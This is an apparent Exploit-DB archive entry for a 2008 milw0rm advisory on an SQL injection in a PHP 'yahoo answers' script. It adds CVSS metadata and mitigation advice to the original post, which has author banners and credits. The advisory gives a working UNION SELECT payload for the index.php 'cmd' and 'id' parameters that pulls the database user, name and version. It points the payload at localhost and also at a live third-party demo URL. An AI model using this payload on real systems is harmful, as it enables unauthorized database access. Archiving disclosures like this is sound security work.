yahoo answers Remote SQL Injection Vulnerability

vendor:

Yahoo Answers

by:

Snakespc

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Yahoo Answers

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

yahoo answers Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject malicious SQL queries into the Yahoo Answers website, potentially gaining unauthorized access to the database and extracting sensitive information.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL injection attacks. Regular security audits and patch updates should also be implemented to address any vulnerabilities.

Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=                      Script: yahoo answers Remote SQL Injection Vulnerability                                  +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =      =                 :::::Mail: snakespc@gmail.com:::::::              =         =
                =                                                                                    =
                =        Sript Demo:http://www.phpstore.info/product_info.php?products_id=163        =
                =                                                                                    =
                =                               www.phpstore.info                                    =              
                 =================================== Snakespc ======================================    


Exploit:

http://localhost/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	 

Demo :

http://phpstore.info/demos/yahooanswers/index.php?cmd=4&id=-1+UNION SELECT 1,2,3,4,5,6,concat(user(),0x3a,database(),0x3a,version()),8,9,10,11,12,13,14,15-- 	
                                                                      
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/SC >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-16]